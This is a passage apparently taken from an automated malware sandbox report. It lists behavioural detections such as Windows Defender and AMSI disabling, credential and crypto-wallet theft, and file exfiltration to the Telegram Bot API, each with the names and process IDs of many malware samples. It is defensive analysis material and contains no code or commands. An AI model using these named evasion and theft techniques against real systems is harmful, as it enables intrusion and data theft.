      • RustMeDebyg.exe (PID: 19912)
      • Axam.exe (PID: 16172)
      • Axam.exe (PID: 19660)
      • Update.exe (PID: 21280)
      • Petya.A.exe (PID: 21248)
      • bnoaprihjatuasss.exe (PID: 21400)
      • backdoor.exe (PID: 21296)
      • jeditor.exe (PID: 21476)
      • lol11.exe (PID: 21384)
      • ProcessHide32.exe (PID: 21264)
      • Destover.exe (PID: 21336)
      • ExtremeInjector.exe (PID: 19360)
      • Jigsaw.exe (PID: 21344)
      • Axam.exe (PID: 20544)
      • PXray_Cast_Sort.exe (PID: 19796)
      • CryptoWall.exe (PID: 21288)
      • lol1.exe (PID: 20036)
      • executavel_temporario.exe (PID: 22516)
      • Gui.exe (PID: 15540)
      • 1488.exe (PID: 14064)
      • 5252.exe (PID: 22652)
      • Axam.exe (PID: 20344)
      • Axam.exe (PID: 22384)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 10192)
      • powershell.exe (PID: 17256)
    • Likely accesses (executes) a file from the Public directory

      • window.exe (PID: 10452)
    • Starts itself from another location

      • 1.exe (PID: 10332)
      • win.exe (PID: 6068)
      • Client.exe (PID: 9996)
      • 11.exe (PID: 9892)
      • CryptoLocker.exe (PID: 12932)
    • File deletion via cmd.exe

      • cmd.exe (PID: 10580)
      • cmd.exe (PID: 11612)
      • cmd.exe (PID: 24556)
      • cmd.exe (PID: 14400)
      • cmd.exe (PID: 18088)
      • cmd.exe (PID: 19512)
      • cmd.exe (PID: 25916)
    • Hides command output

      • cmd.exe (PID: 10580)
      • cmd.exe (PID: 11612)
      • cmd.exe (PID: 8644)
    • Self-deletion pattern has been detected

      • win.exe (PID: 6068)
      • 11.exe (PID: 9892)
    • Starts CMD.EXE with output disabled

      • cmd.exe (PID: 10580)
      • cmd.exe (PID: 11612)
    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 9808)
      • net.exe (PID: 11092)
    • Runs PING.EXE to delay simulation

      • cmd.exe (PID: 10580)
      • cmd.exe (PID: 11612)
      • cmd.exe (PID: 24604)
    • The process checks if it is being run in the virtual environment

      • 2to1ep.exe (PID: 8924)
      • pieletJF.exe (PID: 11348)
      • pieletJF_vm.exe (PID: 12380)
      • build.exe (PID: 11296)
      • cummersMG.exe (PID: 12864)
    • Uses TASKKILL.EXE to kill process

      • fastping_silent_v4.exe (PID: 11216)
      • cmd.exe (PID: 14528)
    • Gets full path of the running script (SCRIPT)

      • wscript.exe (PID: 11524)
      • wscript.exe (PID: 13784)
      • wscript.exe (PID: 13632)
      • wscript.exe (PID: 14688)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 11524)
      • mshta.exe (PID: 9944)
      • wscript.exe (PID: 9604)
      • wscript.exe (PID: 13784)
      • wscript.exe (PID: 13632)
      • wscript.exe (PID: 14688)
    • Contacting a server suspected of hosting an CnC

      • Windows 任务的主机进程.exe (PID: 10536)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
    • Disables Windows Defender real-time protection (POWERSHELL)

      • finale.exe (PID: 9708)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 16320)
    • Starts the AutoIt3 executable file

      • 2to1ep.exe (PID: 8924)
      • StatingConnectors.exe (PID: 16356)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 10120)
      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 9200)
      • powershell.exe (PID: 4916)
      • powershell.exe (PID: 20760)
      • powershell.exe (PID: 17548)
      • powershell.exe (PID: 19304)
      • powershell.exe (PID: 19312)
      • powershell.exe (PID: 16320)
    • Starts a Microsoft application from unusual location

      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • NAMUVPN7.exe (PID: 13740)
      • rxd_en_1.exe (PID: 13944)
      • VC_redist.x64.exe (PID: 2760)
      • StatingConnectors.exe (PID: 16356)
      • Serials_Checker.exe (PID: 16156)
      • dxwebsetup.exe (PID: 9272)
      • dxwsetup.exe (PID: 17708)
      • namuvpnx2.exe (PID: 18008)
      • svchost.exe (PID: 17900)
      • svchost.exe (PID: 18176)
      • svchost.exe (PID: 17872)
      • svchost.exe (PID: 10072)
      • svchost.exe (PID: 17956)
      • svchost.exe (PID: 17880)
      • svchost.exe (PID: 10016)
      • cleanup_tool.exe (PID: 10440)
      • hell9o.exe (PID: 18748)
      • svchost.exe (PID: 18908)
      • svchost.exe (PID: 18676)
      • VC_redist.x64.exe (PID: 20216)
      • 4J8576A0E8V3.exe (PID: 21496)
      • 4J8576A0E8V3.exe (PID: 7332)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 10444)
    • Uncommon PowerShell Invoke command executed

      • powershell.exe (PID: 13564)
      • powershell.exe (PID: 11468)
      • powershell.exe (PID: 20768)
    • Creates new GUID (POWERSHELL)

      • CFXBypass.exe (PID: 6640)
      • Silentum_Spoofer.exe (PID: 8640)
      • powershell.exe (PID: 4916)
    • Malware-specific behavior (creating "System.dll" in Temp)

      • Rsvp_invite%23903388.exe (PID: 13596)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 14192)
      • csc.exe (PID: 15812)
      • csc.exe (PID: 16128)
      • csc.exe (PID: 16268)
      • csc.exe (PID: 16192)
      • csc.exe (PID: 19516)
    • Using the short paths format

      • rod_en_1.exe (PID: 13608)
      • rxd_en_1.exe (PID: 13944)
      • REXCEL~1.EXE (PID: 13316)
      • RMO_SE~2.EXE (PID: 9944)
      • is-BE52S.tmp (PID: 8848)
      • 2to1ep.exe (PID: 8924)
      • FXServer.exe (PID: 11076)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • ExtremeInjector.exe (PID: 9460)
      • bsg.exe (PID: 5864)
      • builder.exe (PID: 15192)
      • 1210.exe (PID: 18300)
      • pfntjejghjsdkr.exe (PID: 19804)
      • builder.exe (PID: 7660)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • RustMeDebyg.exe (PID: 19912)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • Petya.A.exe (PID: 21248)
      • hack1226.exe (PID: 21488)
      • Destover.exe (PID: 21336)
      • ProcessHide32.exe (PID: 21264)
      • CryptoWall.exe (PID: 21288)
      • lol11.exe (PID: 21384)
      • Phantom.exe (PID: 20232)
      • Jigsaw.exe (PID: 21344)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • executavel_temporario.exe (PID: 22516)
      • lol1.exe (PID: 20036)
      • conhost.exe (PID: 25404)
      • PXray_Cast_Sort.exe (PID: 19796)
      • ClassTicket.exe (PID: 21368)
      • mueiel09765.exe (PID: 20372)
      • InfinityCrypt.exe (PID: 21256)
      • nc64.exe (PID: 21320)
      • standalone_payload.exe (PID: 21392)
      • 123123.exe (PID: 22012)
      • Security.exe (PID: 12864)
      • Update.exe (PID: 21280)
      • Gui.exe (PID: 15540)
      • DRIVEapplet.exe (PID: 21328)
      • backdoor.exe (PID: 21296)
      • conhost.exe (PID: 13144)
      • 1488.exe (PID: 14064)
      • ExtremeInjector.exe (PID: 19360)
      • jeditor.exe (PID: 21476)
      • bnoaprihjatuasss.exe (PID: 21400)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • 5252.exe (PID: 22652)
    • NUITKA compiler has been detected

      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
    • Using short paths in the command line

      • rod_en_1.exe (PID: 13608)
      • rxd_en_1.exe (PID: 13944)
      • RMO_SE~2.EXE (PID: 9944)
    • Changes AMSI initialization state that disables detection systems (POWERSHELL)

      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 9200)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 10444)
      • powershell.exe (PID: 9200)
    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 9084)
    • Reads the Windows owner or organization settings

      • pardufrigi_installer_1.0.p1.tmp (PID: 14136)
      • Pinaview.tmp (PID: 14120)
    • Searches and executes a command on selected files

      • forfiles.exe (PID: 16364)
      • forfiles.exe (PID: 19152)
    • Uses NSLOOKUP.EXE to check DNS info

      • cmd.exe (PID: 16308)
      • cmd.exe (PID: 20612)
    • Reads the BIOS version

      • Isass.exe (PID: 15280)
      • Isass.exe (PID: 7912)
    • Checks RAM size (probably for evasion)

      • EmmetPROD.exe (PID: 15520)
      • cmd.exe (PID: 16172)
    • Checks screen resolution (probably for evasion)

      • EmmetPROD.exe (PID: 15520)
      • cmd.exe (PID: 16172)
    • Uses WMIC.EXE to obtain computer system information

      • cmd.exe (PID: 16172)
    • Mutex name with non-standard characters

      • FXServer.exe (PID: 11076)
      • IniEditor.exe (PID: 18636)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • donut.exe (PID: 18732)
      • ExtremeInjector.exe (PID: 9460)
      • 1210.exe (PID: 18300)
      • bsg.exe (PID: 5864)
      • builder.exe (PID: 15192)
      • builder.exe (PID: 7660)
      • file.exe (PID: 8752)
      • 1223.exe (PID: 18104)
      • RustMeDebyg.exe (PID: 19912)
      • Petya.A.exe (PID: 21248)
      • Update.exe (PID: 21280)
      • InfinityCrypt.exe (PID: 21256)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • mueiel09765.exe (PID: 20372)
      • namu864.exe (PID: 21360)
      • bnoaprihjatuasss.exe (PID: 21400)
      • DRIVEapplet.exe (PID: 21328)
      • hack1226.exe (PID: 21488)
      • backdoor.exe (PID: 21296)
      • lol11.exe (PID: 21384)
      • Security.exe (PID: 12864)
      • ProcessHide32.exe (PID: 21264)
      • jeditor.exe (PID: 21476)
      • ClassTicket.exe (PID: 21368)
      • Destover.exe (PID: 21336)
      • ExtremeInjector.exe (PID: 19360)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • standalone_payload.exe (PID: 21392)
      • Phantom.exe (PID: 20232)
      • Tinder%20Bot.exe (PID: 21480)
      • PrivacyPolicy.exe (PID: 11852)
      • nc64.exe (PID: 21320)
      • Jigsaw.exe (PID: 21344)
      • CryptoWall.exe (PID: 21288)
      • PXray_Cast_Sort.exe (PID: 19796)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • lol1.exe (PID: 20036)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • SharpHound.exe (PID: 21272)
      • executavel_temporario.exe (PID: 22516)
      • Gui.exe (PID: 15540)
      • 123123.exe (PID: 22012)
      • 1488.exe (PID: 14064)
      • 5252.exe (PID: 22652)
    • Checks for external IP

      • nslookup.exe (PID: 12360)
      • cssgo.exe (PID: 17492)
      • svchost.exe (PID: 2232)
      • ww7.exe (PID: 13772)
    • Possible stealing from crypto wallets

      • cvf.exe (PID: 16088)
      • bnkrigkawd.exe (PID: 18392)
      • conhost.exe (PID: 13144)
    • Execution of CURL command

      • cvf.exe (PID: 16088)
      • OGFN%20Updater.exe (PID: 11808)
    • Uses CURL.EXE to exfiltrate files to Telegram Bot API

      • cmd.exe (PID: 16984)
      • cmd.exe (PID: 19796)
      • cmd.exe (PID: 6248)
      • cmd.exe (PID: 1152)
    • Starts process via Powershell

      • powershell.exe (PID: 17256)
    • Uses WMIC.EXE to obtain operating system information

      • cmd.exe (PID: 16172)
    • Uses WMIC.EXE to obtain a list of video controllers

      • cmd.exe (PID: 16172)
    • Invokes assembly entry point (POWERSHELL)

      • powershell.exe (PID: 17800)
    • The process executes via Task Scheduler

      • powershell.exe (PID: 17800)
      • Srfuhxm.exe (PID: 18580)
      • FastPingAgent.exe (PID: 12940)
    • ASCII char obfuscation (POWERSHELL)

      • powershell.exe (PID: 17800)
    • Obfuscation pattern (POWERSHELL)

      • powershell.exe (PID: 17800)
    • Uses NETSH.EXE to obtain data on the network

      • cssgo.exe (PID: 17492)
      • cmd.exe (PID: 25972)
      • cmd.exe (PID: 6244)
    • Executes as Windows Service

      • CagService.exe (PID: 17860)
      • paramssps.exe (PID: 21956)
    • The process bypasses the loading of PowerShell profile settings

      • better.exe (PID: 12460)
    • Checks system UUID (probably for evasion)

      • better.exe (PID: 12460)
    • PUTTY has been detected

      • putty.exe (PID: 17028)
    • Process uses IPCONFIG to get network configuration information

      • cmd.exe (PID: 16172)
    • Uses TIMEOUT.EXE to delay execution

      • cmd.exe (PID: 14528)
    • Creates new registry property (POWERSHELL)

      • powershell.exe (PID: 18700)
    • Modifies hosts file to alter network resolution

      • taskmoder.exe (PID: 18692)
    • Reverses array data (POWERSHELL)

      • powershell.exe (PID: 9200)
    • Executes application which crashes

      • support.client.exe (PID: 4284)
      • powershell.exe (PID: 9788)
      • Round_Setup.exe (PID: 13624)
      • 3e3ev3.exe (PID: 18288)
      • Client-built.exe (PID: 18144)
      • VOKLIGHT.exe (PID: 20740)
      • VOKLIGHTD.exe (PID: 19568)
    • Converts a string into array of characters (POWERSHELL)

      • powershell.exe (PID: 9200)
    • Executing commands from ".cmd" file

      • 2to1ep.exe (PID: 8924)
      • hell9o.exe (PID: 18748)
    • Starts application with an unusual extension

      • haeum.exe (PID: 20920)
      • taskmoder.exe (PID: 18692)
      • cmd.exe (PID: 25972)
      • cmd.exe (PID: 6244)
    • Node.exe was dropped

      • steamcmd.exe (PID: 16632)
    • The process verifies whether the antivirus software is installed

      • offlinepackv4.exe (PID: 20784)
    • Creates files in the driver directory

      • taskmoder.exe (PID: 18692)
    • Possible stealing of messenger data

      • bnkrigkawd.exe (PID: 18392)
      • conhost.exe (PID: 13144)
    • Adds exclusion path to Windows Defender (POWERSHELL)

      • finale.exe (PID: 9708)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 20960)
    • Starts CMD.EXE and keeps the shell open after execution

      • cmd.exe (PID: 13588)
      • cmd.exe (PID: 15036)
    • Browser headless start

      • firefox.exe (PID: 1500)
      • msedge.exe (PID: 8776)
      • chrome.exe (PID: 20852)
      • chrome.exe (PID: 6060)
      • firefox.exe (PID: 23468)
      • msedge.exe (PID: 25500)
    • Executable started from TEMP via cmd.exe

      • cmd.exe (PID: 24556)
      • cmd.exe (PID: 18088)
      • cmd.exe (PID: 19512)
      • cmd.exe (PID: 8644)
    • Possible stealing from password managers

      • conhost.exe (PID: 13144)
    • Possible stealing from notes

      • conhost.exe (PID: 13144)
    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 11204)
    • Windows service management via SC.EXE

      • sc.exe (PID: 26008)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 17908)
      • powershell.exe (PID: 4916)
    • Possible stealing of FTP data

      • conhost.exe (PID: 13144)
    • Possible stealing of VPN data

      • conhost.exe (PID: 13144)
    • Suspicious use of NETSH.EXE

      • cssgo.exe (PID: 17492)
    • Process copies executable file

      • cmd.exe (PID: 24604)
    • Query Microsoft Defender preferences

      • conhost.exe (PID: 20840)
    • ADVANCEDINSTALLER mutex has been found

      • setup.exe (PID: 23464)
  • INFO

    • Manual execution by a user

      • OpenWith.exe (PID: 8664)
      • 2to1ep.exe (PID: 3352)
      • 2to1ep.exe (PID: 8084)
    • The sample compiled with english language support

      • 2to1ep.exe (PID: 3352)
      • 2to1ep.exe (PID: 8924)
      • Qbix01.exe (PID: 9796)
      • Prolin.exe (PID: 9988)
      • Axam.a.exe (PID: 10664)
      • Amus.exe (PID: 10740)
      • rmd_en_1.exe (PID: 13320)
      • rod_en_1.exe (PID: 13608)
      • setup.exe (PID: 14300)
      • RMO_SE~2.EXE (PID: 9944)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • is-A140U.tmp (PID: 14020)
      • is-BE52S.tmp (PID: 8848)
      • Isass.exe (PID: 15280)
      • dxwebsetup.exe (PID: 9272)
      • dxwsetup.exe (PID: 17708)
      • StatingConnectors.exe (PID: 16356)
      • 1223.exe (PID: 18104)
      • bsg.exe (PID: 5864)
      • steamcmd.exe (PID: 16632)
      • rsh-192-168-1-89.exe (PID: 20944)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • ClassTicket.exe (PID: 21368)
      • Destover.exe (PID: 21336)
      • ui.exe (PID: 18116)
      • RDPW_Installer.exe (PID: 20856)
      • evil.exe (PID: 20864)
      • 640.exe (PID: 21608)
      • powershell.exe (PID: 11204)
      • xcopy.exe (PID: 26584)
      • xcopy.exe (PID: 16348)
    • Checks supported languages

      • 2to1ep.exe (PID: 3352)
      • 2to1ep.exe (PID: 8924)
      • support.client.exe (PID: 4284)
      • dfsvc.exe (PID: 9084)
      • EagleWingsDNA04.exe (PID: 2156)
      • vnc.exe (PID: 6896)
      • CFXBypass.exe (PID: 6640)
      • Silentum_Spoofer.exe (PID: 8640)
      • win.exe (PID: 6068)
      • file_b584670f7ec2f317.exe (PID: 6556)
      • Auo1.exe (PID: 7928)
      • net_launcher.exe (PID: 9588)
      • finale.exe (PID: 9708)
      • TempSpoofer.exe (PID: 9816)
      • 11.exe (PID: 9892)
      • Client.exe (PID: 9996)
      • Qbix01.exe (PID: 9796)
      • Prolin.exe (PID: 9988)
      • winvnc.exe (PID: 10176)
      • 1.exe (PID: 10332)
      • window.exe (PID: 10452)
      • Windows 任务的主机进程.exe (PID: 10536)
      • Axam.a.exe (PID: 10664)
      • Client.exe (PID: 10588)
      • Amus.exe (PID: 10740)
      • rickroll.exe (PID: 10828)
      • file_c0d2eb6a8b73120b.exe (PID: 11164)
      • fastping_silent_v4.exe (PID: 11216)
      • LOIC.exe (PID: 10280)
      • build.exe (PID: 11296)
      • pieletJF.exe (PID: 11348)
      • Windows 任务的主机进程.exe (PID: 11544)
      • Axam.exe (PID: 11996)
      • pieletJF_vm.exe (PID: 12380)
      • AutoIt3.exe (PID: 12584)
      • fo4translator.exe (PID: 12712)
      • better.exe (PID: 12460)
      • Axam.exe (PID: 12832)
      • implant_http.exe (PID: 8932)
      • keepon.exe (PID: 12592)
      • msedge.exe (PID: 13212)
      • BootstrapperNew.exe (PID: 12572)
      • cummersMG.exe (PID: 12864)
      • curl.exe (PID: 7556)
      • Pinaview.exe (PID: 13164)
      • test.exe (PID: 12344)
      • AddMeFast%20Bot.exe (PID: 9952)
      • dajoke2.exe (PID: 12484)
      • pardufrigi_installer_1.0.p1.exe (PID: 9812)
      • CryptoLocker.exe (PID: 12932)
      • rmd_en_1.exe (PID: 13320)
      • kliulij.exe (PID: 13360)
      • whatever.exe (PID: 13352)
      • VKkQj.exe (PID: 13380)
      • G7_Update.exe (PID: 13388)
      • rod_en_1.exe (PID: 13608)
      • Round_Setup.exe (PID: 13624)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 13680)
      • NAMUVPN7.exe (PID: 13740)
      • Rsvp_invite%23903388.exe (PID: 13596)
      • nircmd.exe (PID: 13748)
      • ww7.exe (PID: 13772)
      • CXmFD.exe (PID: 13556)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 9916)
      • GMSSetupX86.exe (PID: 13616)
      • rxd_en_1.exe (PID: 13944)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14036)
      • pardufrigi_installer_1.0.p1.tmp (PID: 14136)
      • Pinaview.tmp (PID: 14120)
      • RMO_SE~2.EXE (PID: 9944)
      • setup.exe (PID: 14300)
      • REXCEL~1.EXE (PID: 13316)
      • is-A140U.tmp (PID: 14020)
      • is-BE52S.tmp (PID: 8848)
      • Pulsar-Client.exe (PID: 14072)
      • csc.exe (PID: 14192)
      • XClient.exe (PID: 11448)
      • RuntimeBroker.exe (PID: 14368)
      • setup.exe (PID: 14500)
      • Cloudy.exe (PID: 14412)
      • hnmh.exe (PID: 8484)
      • jhgkuyyg.exe (PID: 14548)
      • brbotnet.exe (PID: 11036)
      • beacon.exe (PID: 14580)
      • Konsol.exe (PID: 14460)
      • bjbh.exe (PID: 14660)
      • downloader.exe (PID: 15204)
      • cvtres.exe (PID: 14844)
      • brbotnet.exe (PID: 14516)
      • cry.exe (PID: 15064)
      • VC_redist.x64.exe (PID: 2760)
      • JLFfdd.exe (PID: 14672)
      • uRgOy.exe (PID: 8272)
      • Windows.x64.silent.CPU.exe (PID: 13116)
      • Fast%20Download.exe (PID: 15652)
      • Fast%20Download.exe (PID: 15660)
      • access.exe (PID: 15804)
      • cvf.exe (PID: 12108)
      • lol.exe (PID: 10436)
      • Isass.exe (PID: 15280)
      • BruterV3.1.exe (PID: 15944)
      • cvf.exe (PID: 16088)
      • Service.exe (PID: 14832)
      • csc.exe (PID: 15812)
      • access.exe (PID: 16248)
      • csc.exe (PID: 16268)
      • FXServer.exe (PID: 11076)
      • sunwukongs.exe (PID: 16044)
      • Install.exe (PID: 10496)
      • csc.exe (PID: 16128)
      • EmmetPROD.exe (PID: 15520)
      • 444.exe (PID: 16332)
      • jqqvLru0VAiH3z.exe (PID: 16144)
      • Steanings.exe (PID: 16408)
      • assignment.exe (PID: 16256)
      • agent.exe (PID: 16468)
      • csc.exe (PID: 16192)
      • Steanings.exe (PID: 16520)
      • PowerRat.exe (PID: 16772)
      • Axam.exe (PID: 16644)
      • prueba.exe (PID: 16824)
      • Axam.exe (PID: 17192)
      • prueba.exe (PID: 17084)
      • curl.exe (PID: 17200)
      • uac_bypass.exe (PID: 17352)
      • x64-setup.exe (PID: 15452)
      • steamcmd.exe (PID: 16632)
      • Axam.exe (PID: 7304)
      • StatingConnectors.exe (PID: 16356)
      • dxwebsetup.exe (PID: 9272)
      • gXjgD.exe (PID: 16804)
      • alphaTweaks.exe (PID: 16760)
      • payload.exe (PID: 17452)
      • cssgo.exe (PID: 17492)
      • Serials_Checker.exe (PID: 16156)
      • dxwsetup.exe (PID: 17708)
      • CagService.exe (PID: 17860)
      • self-injection.exe (PID: 16968)
      • hack.exe (PID: 17172)
      • cvtres.exe (PID: 17848)
      • cvtres.exe (PID: 17656)
      • Isass.exe (PID: 7912)
      • cvtres.exe (PID: 17992)
      • Client-built.exe (PID: 18144)
      • Client-built.exe (PID: 18136)
      • prueba.exe (PID: 18384)
      • bnkrigkawd.exe (PID: 18392)
      • Axam.exe (PID: 10848)
      • Lab01-02.exe (PID: 17928)
      • Axam.exe (PID: 17976)
      • cvtres.exe (PID: 16072)
      • Loader.exe (PID: 17824)
      • Client-built.exe (PID: 10620)
      • Axam.exe (PID: 8408)
      • svchost.exe (PID: 17900)
      • svchost.exe (PID: 18176)
      • namuvpnx2.exe (PID: 18008)
      • svchost.exe (PID: 17872)
      • donut.exe (PID: 18312)
      • Mova.exe (PID: 18160)
      • cleanup_tool.exe (PID: 10440)
      • svchost.exe (PID: 10016)
      • svchost.exe (PID: 17880)
      • 3e3ev3.exe (PID: 18288)
      • ljgksdtihd.exe (PID: 3412)
      • kdmapper_Release.exe (PID: 17592)
      • svchost.exe (PID: 10072)
      • svchost.exe (PID: 17956)
      • pclient.exe (PID: 12436)
      • script.exe (PID: 18456)
      • keygen.exe (PID: 11804)
      • connector1.exe (PID: 18608)
      • IniEditor.exe (PID: 18636)
      • connector1.exe (PID: 18684)
      • taskmoder.exe (PID: 18692)
      • justpoc.exe (PID: 18376)
      • svchost.exe (PID: 18676)
      • svchost.exe (PID: 18908)
      • putty.exe (PID: 17028)
      • file_7d9b4f2278093dda.exe (PID: 19036)
      • Axam.exe (PID: 19212)
      • Axam.exe (PID: 19392)
      • plantrojan.exe (PID: 11228)
      • Axam.exe (PID: 19440)
      • srtware.exe (PID: 17764)
      • NJRat.exe (PID: 17172)
      • Axam.exe (PID: 16172)
      • kg.exe (PID: 19188)
      • donut.exe (PID: 18732)
      • requirements.exe (PID: 5308)
      • Updater.exe (PID: 18208)
      • file.exe (PID: 8752)
      • ExtremeInjector.exe (PID: 9460)
      • Axam.exe (PID: 18880)
      • 1223.exe (PID: 18104)
      • wildfire-test-pe-file.exe (PID: 18900)
      • OGFN%20Updater.exe (PID: 11808)
      • 1210.exe (PID: 18300)
      • bsg.exe (PID: 5864)
      • builder.exe (PID: 7660)
      • Axam.exe (PID: 19660)
      • pfntjejghjsdkr.exe (PID: 19804)
      • builder.exe (PID: 15192)
      • hell9o.exe (PID: 18748)
      • lol1.exe (PID: 20036)
      • RustMeDebyg.exe (PID: 19912)
      • Phantom.exe (PID: 20232)
      • VC_redist.x64.exe (PID: 20216)
      • curl.exe (PID: 20372)
      • Axam.exe (PID: 20448)
      • ExtremeInjector.exe (PID: 19360)
      • Axam.exe (PID: 20344)
      • AutoIt3.exe (PID: 17540)
      • Axam.exe (PID: 20544)
      • inst77player_1.0.0.1.exe (PID: 20904)
      • conhost.exe (PID: 20840)
      • Yellow%20Pages%20Scraper.exe (PID: 20816)
      • riende.exe (PID: 20724)
      • snd16061.exe (PID: 20952)
      • calendar.exe (PID: 20808)
      • Update.exe (PID: 21280)
      • Petya.A.exe (PID: 21248)
      • ScreenConnect.ClientSetup.exe (PID: 21304)
      • xerox01_pdf.exe (PID: 20872)
      • haeum.exe (PID: 20920)
      • crypted.exe (PID: 21212)
      • CryptoWall.exe (PID: 21288)
      • Tinder%20Bot.exe (PID: 21480)
      • VOKLIGHT.exe (PID: 20740)
      • Meredrop.exe (PID: 21124)
      • mely.exe (PID: 20936)
      • services.exe (PID: 20800)
      • rsh-192-168-1-89.exe (PID: 20944)
      • zke-nfoview.exe (PID: 21180)
      • standalone_payload.exe (PID: 21392)
      • hack1226.exe (PID: 21488)
      • nc64.exe (PID: 21320)
      • Axam.exe (PID: 19680)
      • 12.exe (PID: 21020)
      • Security.exe (PID: 12864)
      • NAMUVPN32.exe (PID: 21468)
      • fo-wsftp605.exe (PID: 20896)
      • jeditor.exe (PID: 21476)
      • ProcessHide32.exe (PID: 21264)
      • NAMUVPN32.exe (PID: 21460)
      • Jigsaw.exe (PID: 21344)
      • 640.exe (PID: 20848)
      • safman_setup.exe (PID: 21224)
      • Destover.exe (PID: 21336)
      • bnoaprihjatuasss.exe (PID: 21400)
      • DRIVEapplet.exe (PID: 21328)
      • SharpHound.exe (PID: 21272)
      • mueiel09765.exe (PID: 20372)
      • Axam.exe (PID: 22384)
      • file_a6357da6a05d7266.exe (PID: 21376)
      • ClassTicket.exe (PID: 21368)
      • backdoor.exe (PID: 21296)
      • InfinityCrypt.exe (PID: 21256)
      • offlinepackv4.exe (PID: 20784)
      • namu864.exe (PID: 21360)
      • PXray_Cast_Sort.exe (PID: 19796)
      • FreeYoutubeDownloader.exe (PID: 21352)
      • lol11.exe (PID: 21384)
      • PrivacyPolicy.exe (PID: 11852)
      • zke-ascv.exe (PID: 21056)
      • NoEscape.exe (PID: 20912)
      • Agentnov.exe (PID: 21196)
      • ScreenConnect.ClientSetup.exe (PID: 21312)
      • chrome_134.exe (PID: 21240)
      • PCclear_Eng_mini.exe (PID: 20608)
      • Gui.exe (PID: 15540)
      • black.exe (PID: 20776)
      • 4J8576A0E8V3.exe (PID: 7332)
      • executavel_temporario.exe (PID: 22516)
      • 4J8576A0E8V3.exe (PID: 21496)
      • 640.exe (PID: 21608)
      • RDPW_Installer.exe (PID: 20856)
      • MEMZ.exe (PID: 20832)
      • rsh-192-168-1-89.exe (PID: 23340)
      • RegAsm.exe (PID: 23768)
      • NoMoreRansom.exe (PID: 18308)
      • VOKLIGHTD.exe (PID: 19568)
      • Axam.exe (PID: 24008)
      • ui.exe (PID: 18116)
      • namuvpnxp.exe (PID: 13600)
      • 1488.exe (PID: 14064)
      • 123123.exe (PID: 22012)
      • Axam.exe (PID: 24024)
      • safman_setup.tmp (PID: 24288)
      • 5252.exe (PID: 22652)
      • Axam.exe (PID: 24052)
      • Axam.exe (PID: 24452)
      • WindowsUpdate.exe (PID: 17616)
      • patcher.exe (PID: 20716)
      • Axam.exe (PID: 24848)
      • sanghyun.exe (PID: 20792)
      • evil.exe (PID: 24948)
      • Axam.exe (PID: 23988)
      • curl.exe (PID: 24792)
      • steamcmd.exe (PID: 11420)
      • %E5%88%92%E5%AD%A6%E5%8F%B7V2--%E6%9E%81%E9%80%9F%E7%89%88.exe (PID: 3172)
      • FastPingAgent.exe (PID: 12940)
      • Axam.exe (PID: 4756)
      • Axam.exe (PID: 14080)
      • RDPWInst.exe (PID: 13820)
      • curl.exe (PID: 13904)
      • Axam.exe (PID: 23700)
      • Axam.exe (PID: 11136)
      • paramssps.exe (PID: 21956)
      • paramssps.exe (PID: 21108)
      • Axam.exe (PID: 25952)
      • xaimnmxg.jvk.scr (PID: 26436)
      • curl.exe (PID: 26000)
      • Axam.exe (PID: 25960)
      • msiexec.exe (PID: 14872)
      • steamerrorreporter.exe (PID: 19448)
      • CoronaVirus.exe (PID: 20708)
      • Loader.exe (PID: 21028)
      • Axam.exe (PID: 5668)
      • setup.exe (PID: 23464)
      • Axam.exe (PID: 3008)
      • chcp.com (PID: 26548)
      • dw20.exe (PID: 16804)
      • csc.exe (PID: 19516)
      • Axam.exe (PID: 25756)
      • cvtres.exe (PID: 16020)
      • Axam.exe (PID: 3104)
      • dw20.exe (PID: 13344)
      • 52.exe (PID: 10552)
      • [UPG]CSS.exe (PID: 24180)
      • chcp.com (PID: 10420)
    • Launches file with unassociated extension

      • OpenWith.exe (PID: 8664)
    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 8664)
    • Reads the computer name

      • 2to1ep.exe (PID: 3352)
      • 2to1ep.exe (PID: 8924)
      • dfsvc.exe (PID: 9084)
      • EagleWingsDNA04.exe (PID: 2156)
      • support.client.exe (PID: 4284)
      • Silentum_Spoofer.exe (PID: 8640)
      • CFXBypass.exe (PID: 6640)
      • file_b584670f7ec2f317.exe (PID: 6556)
      • win.exe (PID: 6068)
      • finale.exe (PID: 9708)
      • Auo1.exe (PID: 7928)
